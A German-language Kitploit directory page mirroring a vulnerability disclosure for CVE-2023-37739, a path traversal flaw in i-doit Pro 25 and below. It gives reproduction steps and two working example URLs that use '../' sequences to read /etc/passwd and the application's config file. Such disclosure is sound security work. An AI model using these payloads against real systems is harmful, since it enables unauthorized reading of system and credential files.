Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below | Kitploit
Tools/GitHubGitHub/leekenghwa/cve-2023-37739---path-traversal-in-i-doit-pro-25-and-below
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubleekenghwa/cve-2023-37739---path-traversal-in-i-doit-pro-25-and-below

CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
vor 2 JahrenNoch nicht geprüft

CVE-2023-37739 - Path Traversal in i-doit Pro 25 und darunter

i-doit Pro 25 und darunter sind anfällig für eine Path-Traversal-Schwachstelle. Diese Schwachstellen könnten es remote authentifizierten Angreifern (mit niedrigen oder hohen Rechten) ermöglichen, zu Orten zu navigieren, die für den Benutzer nicht zugänglich sein sollten. Sie kann verwendet werden, um vertrauliche Dateien zu lesen und/oder darauf zuzugreifen.

Beschreibung des Produkts: i-doit ist eine webbasierte IT-Dokumentations- und CMDB-Software (Configuration Management Database), entwickelt von der synetics GmbH. i-doit Pro ist die kommerzielle Version der Software und erfordert eine kostenpflichtige Lizenz. Sie bietet zusätzliche Funktionen, professionellen Support sowie regelmäßige Updates und Verbesserungen. Benutzer müssen eine Lizenz erwerben, um i-doit Pro zu nutzen; die Kosten variieren je nach Anzahl der Benutzer und den benötigten Funktionen.

Beschreibung der Schwachstelle: Wir haben festgestellt, dass diese Webanwendung es jedem authentifizierten Benutzer ermöglicht, zu Orten zu navigieren, die für den Benutzer nicht zugänglich sein sollten. Sie kann verwendet werden, um vertrauliche Dateien zu lesen und/oder darauf zuzugreifen ...

Betroffene Webseite: /?moduleID und /index.php

Betroffener Parameter & Komponente 1 : ?moduleID=2&file_manager=image&file

Betroffener Parameter & Komponente 2 : ?viewMode=1100&objID=56&tvMode=1006&catgID=27&objTypeID=39&editMode=0&objGroupID=2&moduleID=2&file_manager=image&file=

Schritt 1: Melden Sie sich als beliebiger gültiger Benutzer an – dies kann ein Benutzer mit niedrigen oder hohen Rechten sein. Navigieren Sie zur untenstehenden URL und ändern Sie die ../../../ in die Datei, die Sie lesen oder auf die Sie zugreifen möchten.

step1

Beispiel 1: http://IP/?moduleID=2&file_manager=image&file=../../../../../../..//etc/passwd

Beispiel 2: http://IP/index.php?viewMode=1100&objID=56&tvMode=1006&catgID=27&objTypeID=39&editMode=0&objGroupID=2&moduleID=2&file_manager=image&file=../../../src/config.inc.php

step2

step3

step4

Tool herunterladen